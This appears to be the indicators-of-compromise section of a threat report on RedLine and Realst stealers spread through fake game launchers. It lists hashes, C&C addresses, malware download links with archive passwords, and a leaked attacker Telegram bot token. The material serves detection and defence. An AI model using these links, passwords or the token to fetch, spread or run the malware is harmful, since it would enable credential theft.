The newest addition checks whether the device it runs on is a VM. It uses crate inside_vm and the function cpuid_cycle_count_avg https://docs.rs/inside-vm/latest/inside_vm/

Also, it stops when it cannot connect to http://167.172.103[.]83:8080/opened from the validate_opening function.

2af0e212ad70eaf8b96a645045ef2764700b5adf7b1187ae3d82240f96f613e2 realst

Wireshark capture

IOCs

RedLine Stealer

RedLine Stealer - SHA256
+------------------------------------------------------------------+-----------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| SHA256                                                           | Filename and extension      | Comment                                                                                                                                                                |
+------------------------------------------------------------------+-----------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 45343a963962faf3185dc03f6ee2035add20adb481c70ef0e9b2511f879c8f6b | Pearl Land Launcher.exe     |                                                                                                                                                                        |
| d0bf843a3e30265ad339a507c275ec68298d381f9452fdc2c5d1438c29bed9a0 | bytes.json                  |                                                                                                                                                                        |
| a466d38458daf4be776032a593de6d2f0b4f49514f1e970aff2d280dd821ae6f | Pearl8.exe                  |                                                                                                                                                                        |
| 287ae5fe115dc9e23629c04cd30ebbf12e719538316f6f86681ba54c0f7213bf | Pearl Land Launcher.exe     |                                                                                                                                                                        |
| d566179f9bff2982c318ea85ab19b2bc0906d5dc766355fb8f327d75e87066d9 | bytes.json                  |                                                                                                                                                                        |
| ceb6cb4805529d4612832c8dd2a49aedd5a3feb9151311f8ab896bcf46411c82 | Pearl4.exe                  |                                                                                                                                                                        |
| c9e599da275abf8595baac8b05efe5a608d7e45103c2e921fdc41269d552edcd | out.ps1                     |                                                                                                                                                                        |
| e6ed4cf603af2549ec43a68005970696959898f297256a51754e2740ba4e852f | deobfuscated-out.ps1        |                                                                                                                                                                        |
| 07e889ad34a429f3295011d92258f5d43a6e015eeb072695fc81535f82b460c1 | payload.exe                 |                                                                                                                                                                        |
| 5264cebc91d6dac5dde818de62c23ccc9054eb79ce1370e8c15a5950e1d86d23 | DestructionSetup.exe        |                                                                                                                                                                        |
| 770050d92ba959250cbc380f2c88027b8958ac756da4b08b8f9b9ea30950b2ff | bytes.json                  |                                                                                                                                                                        |
| 5c5a614e7fd08e67dcb2d584f6877c682e9e17d291c7e4ccdb07e7afd6b5f277 | DestructionGame7.exe        |                                                                                                                                                                        |
| e85101062f748f61e87f91bac8abcaa11b5754fb364b8e99cc67b9e7f0283edc | Evolion Launcher.exe        |                                                                                                                                                                        |
| 0ad38e279f77fa31979f86788245fcf8536e3341d24b56166f64d60daa98343a | Evolion.sfx.exe             |                                                                                                                                                                        |
| 7cd360ee7a4cfe3151db93f2a557a6b564648943ac3d787ecc006eee8c1c84b2 | Evolion.sfx.exe_Overlay.zip |                                                                                                                                                                        |
| 54c7aded200fbb2fa0c5cbfd87721d99227532441a2da24b826b23377178384e | Evolion.exe                 | pumped                                                                                                                                                                 |
| 359a42f042d2782241a6a1a185841c58fe06c2f091327a374587a3c42e547004 | Evolion.exe                 | depumped                                                                                                                                                               |
| 2c93a590c816763dc82e3180e205377639e66723659363140432b1093aa5d533 | Evolion.rar                 | pw: EvolionGame                                                                                                                                                        |
| f0bdc66aa99469763f98c4a76f43adeb9b8ae8696e3ea19a22811fc9b15d1e78 | Evolion.exe                 | pumped                                                                                                                                                                 |
| 69e78f9bd3cbc8d0d097e377bb9be8667313cb00fba0652a514d2658c3d68a97 | Evolion.exe                 | depumped                                                                                                                                                               |
| 93dc05053f3e84a67c89d47f8d49ca02f2287bd5d758486bc26207d64e670106 | Evolion Launcher.exe        |                                                                                                                                                                        |
| 7ed26f6a1d79934b67fc9c19070328e75b26978f3885ae918d41d51ade69c489 | lklp21.zip                  | pw: lklp21                                                                                                                                                             |
| 4968134c22d748f412dae4b39c292468ed4d8859abf81926a80dc5aefbac7ee6 | Evolion.exe                 | pumped                                                                                                                                                                 |
| a93fa90a744a8c44f1612348d5502cf81b836724275dc3367733ddac3e978f66 | Evolion.exe                 | depumped                                                                                                                                                               |
| c809e81fed8fff4660a47b593e105b8f514ece73ed0142ad3a0a2aec61bdd387 | Evolion.rar                 | pw: EvolionGame - uses the same RedLine Stealer build as above 496813...ac7ee6                                                                                         |
| d4b921d8608727de5735603bbb1104d6f0e963e9bb0eed1d85205ef82f34eece | Evolion.rar                 | pw: EvolionGame - past commit from the Evolion GitHub repo - 9a0d6f9ea3175be24ebaccb34f9f2041bc5acb6a                                                                  |
| 6ac88112adb7cf390e8107513f12d542b7a869ed7bb093332b199a8493a550bd | Evolion.exe                 | pumped                                                                                                                                                                 |
| 416ffbf541ec396c711f1553576931c65af849b67158250030f5b94827b3da83 | Evolion.exe                 | depumped                                                                                                                                                               |
| 6a3bd5b4238b9e3e6333eaa1e4c658deaeb4e9a7115dde548aec52f85f26933e | Evolion.rar                 | pw: EvolionGame - past commit from the Evolion GitHub repo - af8fb805345d1a02b8d5bce159cc387db7d3d5fb and uses the same RedLine Stealer build as above 6ac881...a550bd |
| 34341bd570b96a442fb4b11e3e2ce27ba73289e9a77b2e3f57e3f5d8de72b7d7 | Evolion.rar                 | pw: EvolionGame - past commit from the Evolion GitHub repo - a7ceccfe794e3c89601256a0c58f29e460f92897 and uses the previous RedLine Stealer build 54c7ade..178384e     |
| 00ac5235afdd1c22b8a28d2f5cbfbf9d5127680d8991cf21abc035222d0a0613 | OlympOfReptiles.exe         |                                                                                                                                                                        |
| 7a03645778fdb4669f2b568982a722d19bf2a386bba16399d9a681242b2dbc4f | OlympOfReptiles.exe         | located in the launcherApp folder (discussed in execution chain 4)                                                                                                     |
| 0182b6df116ea6b7537bd843fed4828efdb5057b601844e1e95bead492436186 | OlympOfReptilesGame.data    | real format is a ZIP archive                                                                                                                                           |
| 7ba7f029b89f05033c24e08bc085d20d6fb42e7c8f11b07d028dbb133f64af12 | OlympOfReptilesGame.bin     | incorrect magic header                                                                                                                                                 |
| 6b9adb9e33519440e79d13f75d2ffa1a27cd9e419f75c069c0dd0d242b6184f4 | OlympOfReptilesGame.exe     | fixed magic header - pumped                                                                                                                                            |
| 725d1eba223411dcfa236897d059edb6d19f863a827c28ad4c6430285b7a0362 | OlympOfReptilesGame.exe     | depumped                                                                                                                                                               |
| 8c08cc591257fa8a18ecfce9f8f9da262442b26e90c6cf018d744d0daaa671ca | Brawlearth.exe              |                                                                                                                                                                        |
| 4ce77f261c4ddfc7f58f92b8f55ba29fc2faecd189b90626b9d9f38911ad02e8 | Game.zip                    | pw: J$~U9vu(Wl8%`wq                                                                                                                                                    |
| 419f08a38169939a3d66dd1eda58ae7748defef460c8679be928bdd22f477ce3 | gakljeqwkfqw.exe            | pumped                                                                                                                                                                 |
| 36daf6de128b4d0e20e5aee53e4d8b57fbc6beb5f25caf4e91fe0843cc651b17 | gakljeqwkfqw.exe            | depumped                                                                                                                                                               |
| b501cbd56784283e0900fcaaf8589ed264d104da5a688e9d9f6b0a25cd88db79 | Game.zip                    | pw: J$~U9vu(Wl8%`wq                                                                                                                                                    |
| e71580e869ce137a031d810cfdaee330e4fb240a6431f4a2245d98f7baad6553 | gakljeqwkfqw.exe            | pumped                                                                                                                                                                 |
| 638c313209189f54848aa0ae0a1d58039975e0200e21ce28401234e7d2a3913a | gakljeqwkfqw.exe            | depumped                                                                                                                                                               |
| 1e5b475fe010fcc887e362271c6eba904145228c903574c0c23831db79cfc0c8 | SaintLegend.exe             | uses Game.zip - b501cbd56784283e0900fcaaf8589ed264d104da5a688e9d9f6b0a25cd88db79                                                                                       |
| c7b3d627a1c42df440937cb43184dc3133666fe810293da0102a7d93156cc13b | Dawn Land Launcher.exe      |                                                                                                                                                                        |
| 728c0b304f1f064b13aee081611e21951b8ffc99decf9175465eebce3c49bf81 | bytes.json                  |                                                                                                                                                                        |
| 6b937ac8b7f889100cf86a34f74ff2fbdba7b072822026ab275d2a5ee6b7b650 | DawnLand6.exe               |                                                                                                                                                                        |
| 6ef2d9276b57e028763894984b80014581d61f9c4a1659f83f1bb38b87f12436 | WildWorld.exe               |                                                                                                                                                                        |
| f60deaf330c88ed82cc5319c27b2ceaf69d6eb1d7da914669afc837c70ce51e4 | Game.zip                    | pw: J$~U9vu(Wl8%`wq                                                                                                                                                    |
| 49aa6d4bbb1ae73f3f985ad69d8470a1f523b1b7c8012b39ff2be89ccc70a6b4 | gakljeqwkfqw.exe            | pumped                                                                                                                                                                 |
| 0f04e68d258b3edcf493d8453484c8e540a2b4747f1eb761f27f70d03cc7f810 | gakljeqwkfqw.exe            | depumped                                                                                                                                                               |
| 6199ba4ad546fa4c33f99a8be12c48aee376b79129743a830c427f2e427a835e | RyzeXLauncher.exe           |                                                                                                                                                                        |
| 7695a29f94c9ab1075804d5b2682a45abf67f78260a6cdf74fb91eff5e92b847 | Veonikdfkdks.7z             | pw Veonikdfkdks                                                                                                                                                        |
| f0065ff34a2c065c9b98697fe6cb2368924150face5082a0bf286de7eb623f4c | Veonix.exe                  | pumped                                                                                                                                                                 |
| dd8823d9eac573c2b6634f3a63614d01ec455f956c64eb8c50a57900caed557e | Veonis.exe                  | depumped                                                                                                                                                               |
| 026518bd9d1721b15a10380778cc81acf59cf7e68152c9bd7b953ff38375c3ce | GuardiansLauncher.exe       |                                                                                                                                                                        |
| 026518bd9d1721b15a10380778cc81acf59cf7e68152c9bd7b953ff38375c3ce | GuardiansCatalog.exe        | yes--both has the same hashes but different download links and filenames                                                                                               |
| bd22c2369fde6c6b0007d60329a7949be0f94a3f913dbd388bef7a3bc4d17104 | bytes.json                  |                                                                                                                                                                        |
| 012bfb490493cd15e6f1c1e1638929651a2f65886b60288ec937152b374710d8 | GuardiansGame8.exe          |                                                                                                                                                                        |
+------------------------------------------------------------------+-----------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

RedLine Stealer - Mixed
+--------------------------------------------------------------------------------------------+---------+------------------------------------------------------------------------------------------+
| Details                                                                                    | Type    | Comment                                                                                  |
+--------------------------------------------------------------------------------------------+---------+------------------------------------------------------------------------------------------+
| 78.153.130[.]209:29996                                                                     | IP:Port | C&C                                                                                      |
| 212.113.116[.]143:29996                                                                    | IP:Port | C&C                                                                                      |
| 212.113.116[.]143:46628                                                                    | IP:Port | C&C                                                                                      |
| 212.113.116[.]143:23052                                                                    | IP:Port | C&C                                                                                      |
| 37.220.87[.]1                                                                              | IP      | Exposed MySQL server (retrieved from api.php of Destruction and Guardians of the Throne) |
| https://launchersgame.eu-4.evennode[.]com/getbytes/d                                       | URL     |                                                                                          |
| https://pearlapi.eu-4.evennode[.]com/bytes                                                 | URL     |                                                                                          |
| https://peallandik.eu-4.evennode[.]com/bytes                                               | URL     |                                                                                          |
| https://dawnland2.eu-4.evennode.com/bytes                                                  | URL     |                                                                                          |
| https://sandersrocketaa.eu-4.evennode[.]com/getbytes/g                                     | URL     |                                                                                          |
| https://pastebin[.]com/raw/eHW6uaDH                                                        | URL     |                                                                                          |
| https://pastebin[.]com/raw/yJekgtkE                                                        | URL     |                                                                                          |
| https://pastebin[.]com/raw/kYpkEwn3                                                        | URL     |                                                                                          |
| https://cdn.discordapp[.]com/attachments/1109397205409865741/1109427481150242906/out[.]ps1 | URL     |                                                                                          |
| https://www.dropbox[.]com/s/r09eesrdkwtg8mu/Pearl%20Land%20Launcher.exe?dl=1               | URL     |                                                                                          |
| https://www.dropbox[.]com/s/n05qrwwy58nqegx/DestructionSetup.exe?dl=1                      | URL     |                                                                                          |
| https://www.dropbox[.]com/s/3h006ikv0xyk3ku/OlympOfReptiles.exe?dl=1                       | URL     |                                                                                          |
| https://www.dropbox[.]com/s/0fqahirppzmy7jf/Brawlearth.exe?dl=1                            | URL     |                                                                                          |
| https://www.dropbox[.]com/s/kesgp2k48srhkiv/Game[.]zip?dl=1                                | URL     |                                                                                          |
| https://www.dropbox[.]com/s/5prxzmhcw0wokh0/SaintLegend.exe?dl=1                           | URL     |                                                                                          |
| https://www.dropbox[.]com/s/84t1p3pwtpk2n1o/Dawn%20Land%20Launcher.exe?dl=1                | URL     |                                                                                          |
| https://www.dropbox[.]com/s/4g5wjbrgtkxzrhm/WildWorld.exe?dl=1                             | URL     |                                                                                          |
| https://www.dropbox[.]com/s/2f6wj3fdud7tv84/Game[.]zip?dl=1                                | URL     |                                                                                          |
| https://www.dropbox[.]com/s/k0ejw58dy5u4vsf/Veonikdfkdks.7z?dl=1                           | URL     |                                                                                          |
| https://www.dropbox[.]com/s/7eo2d480djjovdx/GuardiansLauncher.exe?dl=1                     | URL     |                                                                                          |
| https://www.dropbox[.]com/s/bwna3zvhxl8213w/GuardiansCatalog.exe?dl=1                      | URL     |                                                                                          |
| https://playdestruction[.]com/api.php                                                      | URL     |                                                                                          |
| https://guardians-game[.]com/api.php                                                       | URL     |                                                                                          |
| https://evoliongame[.]com/Evolion.sfx.exe                                                  | URL     |                                                                                          |
| https://evolion1.beget[.]tech/lklp21[.]zip                                                 | URL     |                                                                                          |
| https://shorturl[.]at/ekzAO                                                                | URL     |                                                                                          |
| https://shorturl[.]at/ftzHQ                                                                | URL     |                                                                                          |
| https://github[.]com/EvolionBeta/evolion/raw/main/Evolion.rar                              | URL     |                                                                                          |
| https://api.telegram[.]org/bot6046856403:AAG29SxB-86mE9fFndksz4zXYM9BZ-lpKow/              | URL     | Exposed Telegram bot (retrieved from api.php of Destruction and Guardians of the Throne) |
+--------------------------------------------------------------------------------------------+---------+------------------------------------------------------------------------------------------+

Realst Stealer

Realst Stealer - SHA256
+------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------+
| SHA256                                                           | Filename and extension         | Comment                                                              |
+------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------+
| a0b8789ef3249b5fa8eb3590cd6f183e24273b5886560233025fc9d8de52ce0b | Pearl Land Launcher v3.pkg     |                                                                      |
| 149784b07294ec991db4ed913ff726a602d6e071899ddb051a05498a3790bd63 | PearLand                       | Mach-O                                                               |
| 1a5db06dca0667a72d24e092c81f1a3a6d8b535696813012cdc636fc652de743 | game.py                        | Firefox decrpyt script                                               |
| 8050a585fe1d534cafecaa56bda08ce2ef3bc26ea2b0ddad90c6b0c2be1ef3af | installer.py                   | chainbreaker script                                                  |
| b08740de7bd8d6805ca2c3c8be1db69fbb7aa9bd6aad1c0582881e4196574aa9 | Pearl Land Launcher.pkg        |                                                                      |
| f5644d70a9885e17dcde888c0270d1b78a0358bb766fccb331742c00c34dda9b | PearLand                       | Mach-O                                                               |
| fc438c6e231c80c0d5de5b5a194fdba87f88e334414b248047c5e412ed613a6a | Destruction.pkg                |                                                                      |
| e0eeb9b87c7ca8b812e9e9a3b6711e0200c80883780b59a3c258c8a3c0d73a29 | Destruction                    | Mach-O                                                               |
| 15a1194ef9caa96a696001dd2d79dc90497189f6d38f617efa8f8cfa6be4563d | Destruction-x64.dmg.zip        |                                                                      |
| f05dc9f39141b886a57b1f07c220030333f50af530c8a5663b9ed6f667111969 | Destruction-x64.dmg            |                                                                      |
| ccbb7510e84df49e1e6bd523ec739ddec71b67e84269d065b0d0ea3942f30471 | Launcher                       |                                                                      |
| ff7b879e7fb4f58c954e46125f0c58f2e413a8a729c5e9e3353152cc8e2509f8 | library.zip                    | from Resources/game/lib/ - Firefox decrypt script                    |
| 64fec4bcd85b3e2129c0e1f3a0201f6effb5667f52067caeba21cade08cd7b94 | library.zip                    | from Resources/extensions/lib/ - chainbreaker script                 |
| 1b490af5dc35d69068318cd0ab4c442d14ce94bc29d207d7973cfcb7a5c6a621 | Destruction.dmg                | signed - retrieved from the app.asar of Destruction-x64.dmg          |
| e8b7e12a44d7c605762e8a3220d26c53ee6c179f02f607c899d4e08a8132f6c5 | Launcher                       | signed Mach-O                                                        |
| 2c0cc8b60e502e9a2a82a1a6acdfa340ff43608dd6fdad32db9ce99b383513e3 | Evolion.pkg                    |                                                                      |
| e0eeb9b87c7ca8b812e9e9a3b6711e0200c80883780b59a3c258c8a3c0d73a29 | Evolion                        | Mach-O                                                               |
| e581b456d13a52ac58f91f47916950b6e7442c54d7dfb15b76fff844e00e0382 | Evolion.pkg                    |                                                                      |
| 03044ce1dea80b43b94497cc7bad22eb3e9c4c7bd4b4d13f74432152fed19411 | Evolion                        | Mach-O                                                               |
| e39cca965dbf7957d04f848572aacfbb736e6aff71e319a788c3f61e52abe795 | Brawl Earth.dmg                |                                                                      |
| fe3ac61c701945f833f218c98b18dca704e83df2cf1a8994603d929f25d1cce2 | Brawl Earth                    | Mach-O - downloader                                                  |
| 78b2fa0df9fba56ba6a773faa0d280977a1a830fce4f2427935f87de11cb9012 | MacBrawlEarth.zip              |                                                                      |
| 0a4f053791180ed2b3f95774dd11e0b87a72ad8681e28ea70df790d5fb955525 | BrawlEarth                     | Mach-O                                                               |
| 0cd929f660a012e390c9098f3dc6d7f41ae32f472f3f266d86789e2b5d1ceee0 | game.py                        | Firefox decrpyt script                                               |
| 28549faab4a2757dc4eb922a7ad3bfa7981f9a132218ae530856ae6da3bc03e6 | installer.py                   | chainbreaker script                                                  |
| efee5f45e5f5134c8b26572ba0b54b68588054a7b0ad75cbce209bb8159922a8 | SaintLegend.dmg                |                                                                      |
| 4c0314b2adf70e8178eca59335e38cad613c39159aa7c97c121798e576eaf28e | SaintLegend                    | Mach-O - downloader - retrieves MacBrawlEarth.zip as well            |
| 8e47262e3a2bdfb7d463d7fc2690644ba3a07701404a73fb7f158b2685702f23 | Dawn Land Launcher (macOS).zip |                                                                      |
| a77010274b411bb2610c0dbb4336cc0f6778a9836f0416f09657c11212e51458 | DawnLand-x64.dmg               |                                                                      |
| 7e3d69ec2da5a65466e4ef4a0f4b715d31fee0000ef4318eab8914e9bf030024 | Launcher                       | Mach-O                                                               |
| e9f1012ed31062dfb4e1f8e6df7b1c07e0bf3c3b75d2bce80c724c03c56d09b3 | Dawn Land Launcher (macOS).pkg |                                                                      |
| 2af0e212ad70eaf8b96a645045ef2764700b5adf7b1187ae3d82240f96f613e2 | realst                         | Mach-O                                                               |
| c729f5715ca5a6039562d9cc52b65cc7ce16ef1ed1451cfc812c7654fa8e3c48 | WildWorld.zip                  |                                                                      |
| 8d506b3527714b7d18d4c9ba292b940aa455876c7bac03b13b00645236f25888 | WildWorld.dmg                  |                                                                      |
| 2c321b1416fb7226bffd1633a2a053ef3921fef9a1de5c49b71ef9c7b0914b00 | WildWorld                      | Mach-O                                                               |
| 4b93ec3fd49c0111e8a11ac8a0a197f5366cda19732932ce4cb84e024c648a38 | GuardiansInstaller.pkg         |                                                                      |
| 016a1a4fe3e9d57ab0b2a11e37ad94cc922290d2499b8d96957c3ddbdc516d74 | GuardiansInstaller             | Mach-O - pkg contains another same file with a name of RyzeXLauncher |
+------------------------------------------------------------------+--------------------------------+----------------------------------------------------------------------+

Realst Stealer - Mixed
+-----------------------------------------------------------------------------------------+---------------+------------------------------------------------------------------------+
| Details                                                                                 | Type          | Comment                                                                |
+-----------------------------------------------------------------------------------------+---------------+------------------------------------------------------------------------+
| suoeruserff1@proton[.]me                                                                | Email address | Used to sign a build - seen on Extra Disk Image from execution chain 3 |
| http://77.91.84[.]110:5000/opened                                                       | URL           | C&C                                                                    |
| http://77.91.84[.]110:5000/send_analytics                                               | URL           | C&C                                                                    |
| http://77.91.84[.]110:8000/opened                                                       | URL           | C&C                                                                    |
| http://77.91.84[.]110:8000/analytics                                                    | URL           | C&C                                                                    |
| http://167.172.103[.]83:8080/opened                                                     | URL           | C&C                                                                    |
| http://167.172.103[.]83:8080/analytics                                                  | URL           | C&C                                                                    |
| https://www.dropbox[.]com/s/8d6t95xu7x2qbpk/Pearl%20Land%20Launcher%20v3.pkg?dl=1       | URL           |                                                                        |
| https://www.dropbox.com/s/br2z1mnirwzfq1r/Destruction.pkg?dl=1                          | URL           |                                                                        |
| https://www.dropbox.com/s/updohgrf084jj3b/Destruction-x64.dmg.zip?dl=1                  | URL           |                                                                        |
| https://www.dropbox.com/s/fsm2gthe74ch5w6/Brawl%20Earth.dmg?dl=1                        | URL           |                                                                        |
| https://www.dropbox.com/s/8m88qcmbz7obygw/MacBrawlEarth.zip?dl=1                        | URL           |                                                                        |
| https://www.dropbox.com/s/c68klcfk38syz4o/SaintLegend.dmg?dl=1                          | URL           |                                                                        |
| https://www.dropbox.com/s/ua1qmbvucb36tls/Dawn%20Land%20Launcher%20%28macOS%29.zip?dl=1 | URL           |                                                                        |
| https://www.dropbox.com/s/ka4c9e7yolhq5ze/WildWorld.zip?dl=1                            | URL           |                                                                        |
| https://www.dropbox.com/s/igvcx4s89trnapa/GuardiansInstaller.pkg?dl=1                   | URL           |                                                                        |
| https://github.com/EvolionBeta/evolion/raw/main/Evolion.pkg                             | URL           |                                                                        |
+-----------------------------------------------------------------------------------------+---------------+------------------------------------------------------------------------+

Direct links to the Evolion GitHub Repository Commits

+------------------------------------------------------------------------------------------------------------------------------+
| URL                                                                                                                          |
+------------------------------------------------------------------------------------------------------------------------------+
| https://github[.]com/EvolionBeta/evolion/raw/a739b020a7cf7301a8f0c52b209c57c4c8150b60/Launcher2[.]exe                        |
| https://github[.]com/EvolionBeta/evolion/raw/358d662b705b22feba5ff5084e210c7b57e88704/OldClassicCalc-2[.]0-setup[.]exe       |
| https://github[.]com/EvolionBeta/evolion/raw/8a7a64aafe30ab305787742ec770fec4d4c9149c/Launcher2[.]exe                        |
| https://github[.]com/EvolionBeta/evolion/raw/b93007bbc267472c9bbbc712ef59a619cbef033a/Evolion%20Launcher[.]exe               |
| https://github[.]com/EvolionBeta/evolion/raw/41e540dd52cfc14313979e939085dae5eb2eacb0/0xvvvvv[.]exe                          |
| https://github[.]com/EvolionBeta/evolion/raw/f17a3047448c936dae170c5b4f2186fe6f922383/OldClassicCalc-2[.]0-setup[.]exe       |
| https://github[.]com/EvolionBeta/evolion/raw/85ae6d514beef67320c68a6fca21628236dbd3d8/LoaderWPF[.]exe                        |
| https://github[.]com/EvolionBeta/evolion/raw/8e4e7e1eb8c08fcc3f7249cd2f172777baa723f2/LoaderWPF[.]exe                        |
| https://github[.]com/EvolionBeta/evolion/raw/5a18daf9bf0cfa26428cc6dbf9df0cec4eed0981/Evolion%20Launcher[.]exe               |
| https://github[.]com/EvolionBeta/evolion/raw/21b4b3ebd7337c5d05e25aeadcee01ab0ffc54b6/Evolion[.]rar                          |
| https://github[.]com/EvolionBeta/evolion/raw/9a0d6f9ea3175be24ebaccb34f9f2041bc5acb6a/Evolion[.]rar                          |
| https://github[.]com/EvolionBeta/evolion/raw/b32f322adedb4ce45c79769dd9c8e9d7ab1ecd7f/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/af8fb805345d1a02b8d5bce159cc387db7d3d5fb/Evolion[.]rar                          |
| https://github[.]com/EvolionBeta/evolion/raw/44c0850cc6c8f10d776a750670882242b584be9c/Evolion%20Launcher[.]exe               |
| https://github[.]com/EvolionBeta/evolion/raw/8cce0ef8fea028f1881d6ad1b3b383b94fc28cba/LoaderWPF[.]rar                        |
| https://github[.]com/EvolionBeta/evolion/raw/e98807fc3b2547e2a63604101cb987ac8adef5e9/LoaderWPF[.]exe                        |
| https://github[.]com/EvolionBeta/evolion/raw/51cede2502dda3efb5513b58ef60f8daad8c5f64/Evolion%20Launcher[.]exe               |
| https://github[.]com/EvolionBeta/evolion/raw/84b201ca69d69ca3866198ae5fe1e3b118c4a039/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/abf53d82b63b7120e6c2175797160fa901aca766/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/a7ceccfe794e3c89601256a0c58f29e460f92897/Evolion[.]rar                          |
| https://github[.]com/EvolionBeta/evolion/raw/6616c7f9134dd8ab8ac46b9e983bb6ceb9d58ff2/Evolion%20Launcher[.]exe               |
| https://github[.]com/EvolionBeta/evolion/raw/71527377ff76e535f7941002cdbabd9fc419a986/repos[.]rar                            |
| https://github[.]com/EvolionBeta/evolion/raw/c9638d98eb9db8561649d111c810415a20463584/Evolion%20Launcher[.]exe               |
| https://github[.]com/EvolionBeta/evolion/raw/32ae3e7d0c9efaaa204ec856c19d02b6e2703ffd/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/2a0e18ccbcaed55d99cae93afe5a13c31783f99e/OldClassicCalc-2[.]0-setup[.]sfx[.]exe |
| https://github[.]com/EvolionBeta/evolion/raw/daa231c991bfc6097c305d49ab7326e629dc3f0b/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/6e76dbfeb127ebe598d0c45e97221b2e63f82250/Evolion[.]rar                          |
| https://github[.]com/EvolionBeta/evolion/raw/99f1f0fd6140fd48691c2df6b2cd475e0c5d3187/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/8acc3518223bbbc9e80156b4494b235e4cf972ee/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/2af1263d0273c82cd1e658a3db842e513bf0893f/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/b7443732443cbe078b107102efed35a1dd86606b/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/e0ba5cabd5a94a1cac2d7bcf74af66cfe2c74a33/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/raw/201dc1f26696d4e61ec38b9545a4c3173a64c7b0/Evolion[.]pkg                          |
| https://github[.]com/EvolionBeta/evolion/commit/a739b020a7cf7301a8f0c52b209c57c4c8150b60                                     |
| https://github[.]com/EvolionBeta/evolion/commit/3ff21b58124330e9baa9fb9903e2e441f7ccc9d9                                     |
| https://github[.]com/EvolionBeta/evolion/commit/358d662b705b22feba5ff5084e210c7b57e88704                                     |
| https://github[.]com/EvolionBeta/evolion/commit/8a7a64aafe30ab305787742ec770fec4d4c9149c                                     |
| https://github[.]com/EvolionBeta/evolion/commit/b93007bbc267472c9bbbc712ef59a619cbef033a                                     |
| https://github[.]com/EvolionBeta/evolion/commit/41e540dd52cfc14313979e939085dae5eb2eacb0                                     |
| https://github[.]com/EvolionBeta/evolion/commit/f17a3047448c936dae170c5b4f2186fe6f922383                                     |
| https://github[.]com/EvolionBeta/evolion/commit/85ae6d514beef67320c68a6fca21628236dbd3d8                                     |
| https://github[.]com/EvolionBeta/evolion/commit/8e4e7e1eb8c08fcc3f7249cd2f172777baa723f2                                     |
| https://github[.]com/EvolionBeta/evolion/commit/5a18daf9bf0cfa26428cc6dbf9df0cec4eed0981                                     |
| https://github[.]com/EvolionBeta/evolion/commit/21b4b3ebd7337c5d05e25aeadcee01ab0ffc54b6                                     |
| https://github[.]com/EvolionBeta/evolion/commit/9a0d6f9ea3175be24ebaccb34f9f2041bc5acb6a                                     |
| https://github[.]com/EvolionBeta/evolion/commit/b32f322adedb4ce45c79769dd9c8e9d7ab1ecd7f                                     |
| https://github[.]com/EvolionBeta/evolion/commit/af8fb805345d1a02b8d5bce159cc387db7d3d5fb                                     |
| https://github[.]com/EvolionBeta/evolion/commit/44c0850cc6c8f10d776a750670882242b584be9c                                     |
| https://github[.]com/EvolionBeta/evolion/commit/8cce0ef8fea028f1881d6ad1b3b383b94fc28cba                                     |
| https://github[.]com/EvolionBeta/evolion/commit/e98807fc3b2547e2a63604101cb987ac8adef5e9                                     |
| https://github[.]com/EvolionBeta/evolion/commit/51cede2502dda3efb5513b58ef60f8daad8c5f64                                     |
| https://github[.]com/EvolionBeta/evolion/commit/84b201ca69d69ca3866198ae5fe1e3b118c4a039                                     |
| https://github[.]com/EvolionBeta/evolion/commit/abf53d82b63b7120e6c2175797160fa901aca766                                     |
| https://github[.]com/EvolionBeta/evolion/commit/a7ceccfe794e3c89601256a0c58f29e460f92897                                     |
| https://github[.]com/EvolionBeta/evolion/commit/6616c7f9134dd8ab8ac46b9e983bb6ceb9d58ff2                                     |
| https://github[.]com/EvolionBeta/evolion/commit/71527377ff76e535f7941002cdbabd9fc419a986                                     |
| https://github[.]com/EvolionBeta/evolion/commit/c9638d98eb9db8561649d111c810415a20463584                                     |
| https://github[.]com/EvolionBeta/evolion/commit/32ae3e7d0c9efaaa204ec856c19d02b6e2703ffd                                     |
| https://github[.]com/EvolionBeta/evolion/commit/2a0e18ccbcaed55d99cae93afe5a13c31783f99e                                     |
| https://github[.]com/EvolionBeta/evolion/commit/daa231c991bfc6097c305d49ab7326e629dc3f0b                                     |
| https://github[.]com/EvolionBeta/evolion/commit/6e76dbfeb127ebe598d0c45e97221b2e63f82250                                     |
| https://github[.]com/EvolionBeta/evolion/commit/99f1f0fd6140fd48691c2df6b2cd475e0c5d3187                                     |
| https://github[.]com/EvolionBeta/evolion/commit/8acc3518223bbbc9e80156b4494b235e4cf972ee                                     |
| https://github[.]com/EvolionBeta/evolion/commit/2af1263d0273c82cd1e658a3db842e513bf0893f                                     |
| https://github[.]com/EvolionBeta/evolion/commit/b7443732443cbe078b107102efed35a1dd86606b                                     |
| https://github[.]com/EvolionBeta/evolion/commit/e0ba5cabd5a94a1cac2d7bcf74af66cfe2c74a33                                     |
| https://github[.]com/EvolionBeta/evolion/commit/201dc1f26696d4e61ec38b9545a4c3173a64c7b0                                     |
+------------------------------------------------------------------------------------------------------------------------------+

Fake Game 1: Pearl Land Metaverse

Twitter: https://twitter.com/VersePearl (1551260596137381888) Linktree: https://linktr[.]ee/pearlmetaverse Gitbook: https://pearl-land.gitbook[.]io/pearl-land-metaverse/ OpenSea collection: https://opensea.io/collection/pearlmetaverse Discord: https://discord[.]gg/pearlmetaverse Medium: https://medium.com/@pearl-metaverse Pearl Land (PLM) ERC20 token: 0x49f7943ae6cb847a3e6301ed8bc5eafff30e90d1 Token deployer: 0xeee08425a84e4c42e6392cbd23eeb40520243fdf Domain: pearlmetaverse[.]io The real game is called Rune Teller by CODELIFE Studio on Steam.

Ethereum wallet addresses related to the NFTs - OpenSea collection
